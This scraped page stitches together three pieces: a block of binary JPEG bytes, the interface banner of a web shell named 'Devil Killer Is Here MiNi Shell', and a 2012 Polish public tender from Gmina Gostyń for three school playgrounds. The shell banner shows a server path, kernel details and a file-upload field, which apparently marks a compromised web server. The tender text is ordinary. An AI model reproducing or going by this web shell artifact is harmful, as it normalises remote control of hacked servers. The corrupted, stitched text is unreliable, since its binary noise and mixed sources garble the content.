JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120625/136971-N-2012.html

<p class="kh_header"><b>Gostyń: Budowa placów zabaw na terenie Gminy - 3 place zabaw w ramach Rządowego Programu - Radosna Szkoła</b><br>
<b>Numer ogłoszenia: 136971 - 2012; data zamieszczenia: 25.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gostyń, reprezentowana przez Burmistrza Gostynia , ul. Rynek 2, 63-800 Gostyń, woj. wielkopolskie, tel. 065 5752110-13, faks 065 5752142.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gostyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa placów zabaw na terenie Gminy - 3 place zabaw w ramach Rządowego Programu - Radosna Szkoła.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa placów zabaw na terenie Gminy - 3 place zabaw 
w ramach Rządowego Programu - Radosna Szkoła.

Zamawiający wymaga, aby przedmiot zamówienia był objęty min. 5-letnim okresem gwarancji/rękojmi, która rozpocznie swój bieg od daty odbioru końcowego zamówienia przez Zamawiającego.

Zakres rzeczowy przedmiotowego zadania opisany jest szczegółowo w dokumentacji technicznej (projekcie technicznym, specyfikacji technicznej wykonania i odbioru robót, przedmiarze robót).

Zamawiający dopuszcza możliwość składania ofert - rozwiązań równoważnych.  Wszystkim wskazaniom znaków towarowych, patentów lub pochodzenia występującym w  dokumentacji projektowej towarzyszą wyrazy lub równoważny, co oznacza, że dopuszcza się zastosowanie urządzeń i materiałów nie gorszych niż opisywane w dokumentacji, 
tj. spełniających wymagania techniczne, funkcjonalne i jakościowe co najmniej takie jak wskazane w dokumentacji projektowej lub lepsze.

1.	Przedmiotem zamówienia jest wykonanie trzech placów zabaw na terenie Gminy Gostyń dla zadania pn: Budowa placów zabaw na terenie Gminy - 3 place zabaw w ramach Rządowego Programu - Radosna Szkoła, obejmującego budowę:  
1.1	małego placu zabaw zlokalizowany na działce nr: 158/4 przy Szkole Podstawowej im. Janusza Kusocińskiego w Daleszynie, Daleszyn 76, 63-800 Gostyń; 
Plac zabaw należy wykonać zgodnie z dokumentacją techniczną, stanowiącą załącznik nr 1 do SIWZ; 
1.2	małego placu zabaw zlokalizowany na działce nr: 213/7 przy Szkole Podstawowej 
w Goli, Gola 17, 63-800 Gostyń. Plac zabaw należy wykonać zgodnie z dokumentacją techniczną, stanowiącą załącznik nr 1 do SIWZ; 
1.3	małego placu zabaw zlokalizowany na działce nr: 104/10 przy Szkole Podstawowej w Sikorzynie, Sikorzyn 16b, 63-800 Gostyń. Plac zabaw należy wykonać zgodnie 
z dokumentacją techniczną, stanowiącą załącznik nr 1 do SIWZ; 

2.	Zakres prac do wykonania obejmuje m.in.:
2.1	mały plac zabaw przy Szkole Podstawowej im. Janusza Kusocińskiego 
w Daleszynie 
a)	Oczyszczenie terenu i przygotowanie podbudowy;
b)	Demontaż istniejących urządzeń zabawowych drewnianych wraz z utylizacją - 7 kpl. w tym 2 urządzenia (bujaki) będą ponownie posadowione i zamontowane w wyznaczonym miejscu przez Zamawiającego;
c)	Wykonanie obrzeży wraz z podbudową wokół nawierzchni bezpiecznej, komunikacyjnej o długości ~ 51,27 mb;
d)	Zakup i montaż nawierzchni bezpiecznej, syntetycznej, wylewanej o powierzchni ~141,00 m2 w kolorze RAL 2011, PANTONE 152 C zgodnej z normą PN-EN 1177/2009;
e)	Zakup i montaż nawierzchni komunikacyjnej, syntetycznej, wylewanej o powierzchni ~20,56 m2 w kolorze RAL 5003, PANTONE 540 C zgodnej z normą PN-EN 1177/2009;
f)	Ogrodzenie terenu - wykonane jako naturalny żywopłot np.: żywopłot żywotnik zachodni - typu smaragd o długości ~ 50,00 mb i wysokości min ~1,00 m, w ilości 2 nasadzenia /1mb;
g)	Wykonanie nawierzchni trawiastej z rolki (darń odcinana z gruntu) o powierzchni ~100,00 m2;
h)	Dostawę i montaż urządzeń: 
- zestawu zabawowego - 1 szt.
- sprężynowca tuby - 1 szt.
- równoważni wiszącej - 1 szt.
- słupków sprawnościowych bez uchwytu - 3 szt.
- słupków sprawnościowych z uchwytem - 4 szt.
- deski balansującej na sprężynach - 1 szt.
- równoważni balansującej stałej - 1 szt.
- sprężynowca kwiat na sprężynie - 1 szt. 
- słupków sprawnościowych obrotowych z uchwytem - 1 szt.
- tablicy regulaminowej oraz tabliczek informacyjnych zgodnych z projektem wykonawczym - 1 szt.
- ławki z oparciem - 1 szt.
- kosza na śmieci - 1 szt.
SZCZEGÓŁOWY OPIS URZĄDZEŃ OPISANY JEST W PROJEKCIE BUDOWLANYM.
ELEMENTY GOTOWE - PROJEKTOWANE NA ZAMÓWIENIE MUSZĄ POSIADAĆ WSZELKIE, WYMAGANE NORMAMI CERTYFIKATY.
i)	Wykonaniu obsługi geodezyjnej;
j)	Przygotowaniu kompletu dokumentów do zgłoszenia zakończenia robót;
k)	Przygotowaniu informacji dotyczącej bezpieczeństwa i ochrony zdrowia, w przypadku gdy jej opracowanie jest wymagane na podstawie odrębnych przepisów.

2.2	mały plac zabaw przy Szkole Podstawowej w Goli
a)	Oczyszczenie terenu i przygotowanie podbudowy;
b)	Demontaż istniejących urządzeń zabawowych metalowych wraz z utylizacją - 6 kpl.; 
c)	Wykonanie obrzeży wraz z podbudową wokół nawierzchni bezpiecznej, komunikacyjnej o długości ~ 59,56 mb;
d)	Zakup i montaż nawierzchni bezpiecznej, syntetycznej, wylewanej o powierzchni ~140,65 m2 w kolorze RAL 2011, PANTONE 152 C zgodnej z normą PN-EN 1177/2009;
e)	Zakup i montaż nawierzchni komunikacyjnej, syntetycznej, wylewanej o powierzchni ~20,15m2 w kolorze RAL 5003, PANTONE 540 C zgodnej z normą PN-EN 1177/2009;
l)	Ogrodzenie terenu - wykonane jako naturalny żywopłot np.: żywopłot żywotnik zachodni - typu smaragd o długości ~ 55,50mb i wysokości min ~1,00 m w ilości 2 nasadzenia /1mb;
f)	Wykonanie nawierzchni trawiastej z rolki (darń odcinana z gruntu) o powierzchni ~115,50 m2;
m)	Dostawę i montaż urządzeń: 
- zestawu zabawowego - 1 szt.
- zestawu sprawnościowego - 1 szt.
- kosza do gry - 1 szt.
- słupków sprawnościowych obrotowych z uchwytem - 1 szt.
- deski balansującej na sprężynach - 1 szt.
- słupków sprawnościowych bez uchwytu - 2 szt.
- słupków sprawnościowych z uchwytem - 2 szt.
- równoważni wiszącej - 1 szt.
- równoważni balansującej stałej - 1 szt.
- sprężynowca tuby - 1 szt.
- słupków sprawnościowych obrotowych bez uchwytu - 1 szt.
- tablicy regulaminowej oraz tabliczek informacyjnych zgodnych z projektem wykonawczym - 1 szt.
- ławki z oparciem - 2 szt.
- kosza na śmieci - 1 szt.
SZCZEGÓŁOWY OPIS URZĄDZEŃ OPISANY JEST W PROJEKCIE BUDOWLANYM.
ELEMENTY GOTOWE - PROJEKTOWANE NA ZAMÓWIENIE MUSZĄ POSIADAĆ WSZELKIE, WYMAGANE NORMAMI CERTYFIKATY.

g)	Wykonanie obsługi geodezyjnej;
h)	Przygotowanie kompletu dokumentów do zgłoszenia zakończenia robót;
i)	Przygotowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia, w przypadku gdy jej opracowanie jest wymagane na podstawie odrębnych przepisów;

2.3	mały plac zabaw przy Szkole Podstawowej w Sikorzynie
a)	Oczyszczenie terenu i przygotowanie podbudowy;
b)	Wykonanie obrzeży wraz z podbudową wokół nawierzchni bezpiecznej, komunikacyjnej o długości ~ 58,60 mb;
c)	Zakup i montaż nawierzchni bezpiecznej, syntetycznej, wylewanej o powierzchni ~142,23 m2 w kolorze RAL 2011, PANTONE 152 C zgodnej z normą PN-EN 1177/2009 (łączna powierzchnia nawierzchni dla HIC = 1,50m i HIC = 2,20 m);
d)	Zakup i montaż nawierzchni komunikacyjnej, syntetycznej, wylewanej o powierzchni ~21,04 m2 w kolorze RAL 5003, PANTONE 540 C zgodnej z normą PN-EN 1177/2009;
e)	Ogrodzenie terenu - wykonane jako naturalny żywopłot np.: żywopłot żywotnik zachodni - typu smaragd o długości ~ 18,50mb i wysokości min ~1,00 m w ilości 2 nasadzenia /1mb;
f)	Demontażu starej statki wraz z utylizacją oraz montaż nowej siatki powlekanej stalowej o oczku min 40x40, grubości d>=3mm i wysokości 1,5m na odcinku ~55,00mb w kolorze RAL 6005 (zielony) wraz z drutem naciągowym. Słupki ogrodzenia pozostają istniejące;
g)	Oczyszczenie wraz z dwukrotnym pomalowaniem farbą olejną słupków ogrodzenia w ilości ~25 szt.  kolorze RAL 6005 (zielony);
h)	Wykonanie nawierzchni trawiastej z rolki (darń odcinana z gruntu) o powierzchni ~166,00 m2;
i)	Dostawę i montaż urządzeń: 
- zestawu zabawowego - 1 szt.,
- zestawu sprawnościowego - 1 szt.,
- kosza do gry - 1 szt.
- słupków sprawnościowych obrotowych z uchwytem - 1 szt.
- deski balansującej na sprężynach - 1 szt.
- słupków sprawnościowych bez uchwytu - 3 szt.
- słupków sprawnościowych z uchwytem - 3 szt.
- równoważni wiszącej - 1 szt.
- równoważni balansującej stałej - 1 szt.
- sprężynowca tuby - 1 szt.
- tablicy regulaminowej oraz tabliczek informacyjnych zgodnych z projektem wykonawczym - 1 szt.
- ławki z oparciem - 1 szt.
- kosza na śmieci - 1 szt.
SZCZEGÓŁOWY OPIS URZĄDZEŃ OPISANY JEST W PROJEKCIE BUDOWLANYM.
ELEMENTY GOTOWE - PROJEKTOWANE NA ZAMÓWIENIE MUSZĄ POSIADAĆ WSZELKIE, WYMAGANE NORMAMI CERTYFIKATY.
j)	Wykonanie obsługi geodezyjnej;
k)	Przygotowanie kompletu dokumentów do zgłoszenia zakończenia robót;
l)	Przygotowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia, w przypadku gdy jej opracowanie jest wymagane na podstawie odrębnych przepisów.

3.	Roboty budowlane pn: Budowa placów zabaw na terenie Gminy należy wykonać zgodnie z obowiązującymi przepisami i normami, zasadami sztuki budowlanej oraz wymaganiami określonymi w SIWZ.

4.	Technologia wykonania robót budowlanych, wymagania dot. konstrukcji:
a)	 materiały, substancje, śruby, łańcuchy, sprężyny i inne połączenia oraz elementy zabezpieczające wykorzystane przy produkcji i montażu urządzeń mają posiadać wymagane atesty i dopuszczenia,
b)	elementy konstrukcyjne - belki pionowe i poziome wykonane ze stali ocynkowanej, malowane proszkowo,
c)	elementy metalowe malowane proszkowo, farbami zapewniającymi odporność na warunki atmosferyczne,
d)	zjeżdżalnie o minimalnej długości 1,20 m ze stali nierdzewnej,
e)	elementy należy mocować w fundamencie umieszczonym pod powierzchnią gruntu na stałe,
f)	daszki i burty wykonane z płyty HPL lub HDPE, rożne kolory np.: czerwony, żółty, zielony, niebieski aby zwiększyć atrakcyjność zestawów,
g)	łańcuchy techniczne huśtawek kalibrowane fi 6, ocynkowane,
h)	stopnie wykonane z materiałów antypoślizgowych, 
i)	ławki o konstrukcji metalowej, siedziska drewniane malowane farbą akrylową, siedzisko i oparcie wykonane z drewna zabezpieczonego przed działaniem czynników atmosferycznych, montowane na podłożu za pomocą kotew stalowych ocynkowanych w fundamencie,
j)	sprężynowce zamontowane na sprężynie o średnicy 200mm, zabetonowanej w gruncie za pomocą kotew ocynkowanych, 
k)	wszystkie zastosowane materiały muszą być zgodne z obowiązującymi normami 
i prawem,
l)	użytkowanie urządzeń nie może stanowić zagrożenia dla zdrowia użytkujących ludzi,
m)	prowadzone roboty montażowe muszą zostać przeprowadzone zgodnie z normami 
i instrukcjami montażu producentów i Wykonawców,
n)	zastosowane rozwiązania i materiały muszą być sprawdzone, powszechnie stosowane 
i wysokiej jakości użytkowej, a ich eksploatacja nie wywierać negatywnego wpływu na bezpieczeństwo i zdrowie ludzi,
o)	urządzenia muszą być tak zamontowane, aby zapewniały utrzymanie stref bezpieczeństwa,
p)	płyty, użyte w elementach placu zabaw powinny nie ulegać gięciu, puchnięciu, muszą być odporne na chemikalia, wpływy atmosferyczne, malowane lakierami wodnymi,
q)	śruby mocujące ocynkowane lub nierdzewne,
r)	miejsca łączenia zabezpieczone zaślepkami,
s)	podczas montażu Wykonawca musi unikać szkodliwych działań dla środowiska, 
a przede wszystkim emitowania nadmiernego hałasu,
t)	wygrodzenie terenu wykonane jako naturalny żywopłot o wysokości min ~1,00 m 
w  ilości 2 nasadzenia /1mb,
u)	nawierzchnia przepuszczalna, bezpieczna syntetyczna, wylewana - kolor pomarańczowy, na podbudowie z kruszywa naturalnego, stabilizowanego mechanicznie oraz mieszanek mineralno -bitumicznych wraz ze stopami fundamentowymi betonowymi na wydzielonych polach pod urządzenia sportowe, GRUBOŚĆ NAWIERZCHNI NALEŻY DOSTOSOWAĆ DO MAKSYMALNEJ MOŻLIWEJ WYSOKOŚCI SWOBODNEGO UPADKU 
Z POSZCZEGÓLNYCH URZĄDZEŃ, nawierzchnia musi być wykonana zgodnie z normą PN-EN 1177/2009,
v)	nawierzchnia przepuszczalna, komunikacyjna syntetyczna, wylewana - kolor niebieski, na podbudowie z kruszywa naturalnego, stabilizowanego mechanicznie oraz mieszanek mineralno - bitumicznych w celu ułatwienia spływu wód opadowych należy zastosować na nawierzchni spadek ~ 1,0%, GRUBOŚĆ NAWIERZCHNI NALEŻY DOSTOSOWAĆ DO MAKSYMALNEJ MOŻLIWEJ WYSOKOŚCI SWOBODNEGO UPADKU Z POSZCZEGÓLNYCH URZĄDZEŃ, nawierzchnia musi być wykonana zgodnie z normą PN-EN 1177/2009,
w)	nawierzchnia trawiasta z rolki - wykonana jako naturalna darń odcinana z gruntu, nawierzchnia powinna być wyprofilowana ze spadkiem od 1-3 %, ułatwiającym powierzchniowy odpływ wody,
x)	nawierzchnie, o których mowa w ust. 4 pkt u i v, należy ograniczyć obrzeżem betonowym na styku z nawierzchnią trawiastą.

5.	Kolory nawierzchni przyjęto zgodnie z kolorystyką znaku identyfikacji wizualnej programu SZKOŁA BEZPIECZNA I PRZYJAZNA, tj. dla nawierzchni bezpiecznej syntetyczna, wylewana paleta barw PANTONE: 152C; RAL: 2011 Tieforange, dla nawierzchni komunikacyjnej, syntetycznej, wylewanej paleta barw PANTONE: 540C; RAL: 5003 Saphirblau.

6.	Użyte przy realizacji robót materiały i wyposażenie winny spełniać wymagania określone w art. 10 Prawa budowlanego. Zamawiający wymaga, aby wszystkie urządzenia zabawowe posiadały certyfikaty wydane przez akredytowane jednostki potwierdzające, że urządzenia są zgodne z normami. Rozmieszczenie urządzeń wyposażenia placu zabaw na nawierzchniach bezpiecznych zaprojektowano w taki sposób, by znajdowały się one od siebie oraz od innych nawierzchni w odległości min. 1,50 m.

UWAGA: Zaleca się wykonawcom przeprowadzenie wizji lokalnej obiektu w celu uzyskania na swoją odpowiedzialność i ryzyko, wszelkich istotnych informacji, które mogą być konieczne dla prawidłowego przygotowania oferty i zawarcia umowy.

W ofercie należy uwzględnić ponadto: koszt wykonania dokumentacji powykonawczej, geodezyjnej inwentaryzacji powykonawczej obiektu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.21.40-9, 45.11.27.23-9, 37.53.52.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Składający ofertę musi wnieść wadium w wysokości: 8.000,00 zł (słownie: osiem tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, zgodnie ze sztuką budowlaną i prawidłowo ukończył budowę jednego placu zabaw z nawierzchnią syntetyczną - bezpieczną, komunikacyjną, wylewaną wraz z wyposażeniem w urządzenia;  
(Uwaga: wymagane doświadczenie zawodowe może wynikać z wykonania odrębnych zadań);
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana na podstawie analizy przedstawionych dokumentów ( niżej wymienionych);</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca udokumentuje dysponowanie jedną osobą posiadającą odpowiednie uprawnienia budowlane do kierowania robotami budowlanymi w specjalności: konstrukcyjno - budowlanej lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów (potwierdzenie przynależności do izby inżynierów bud. będzie wymagane na etapie podpisania umowy z wybranym wykonawcą).
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana na podstawie analizy przedstawionych dokumentów (niżej wymienionych);</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca udokumentuje: 
a)  posiadanie środków finansowych lub zdolności kredytowej w wysokości co najmniej 300.000 zł (słownie: trzysta tysięcy złotych),
b) posiadanie aktualnego ubezpieczenia od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana na podstawie analizy przedstawionych dokumentów ( niżej wymienionych);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

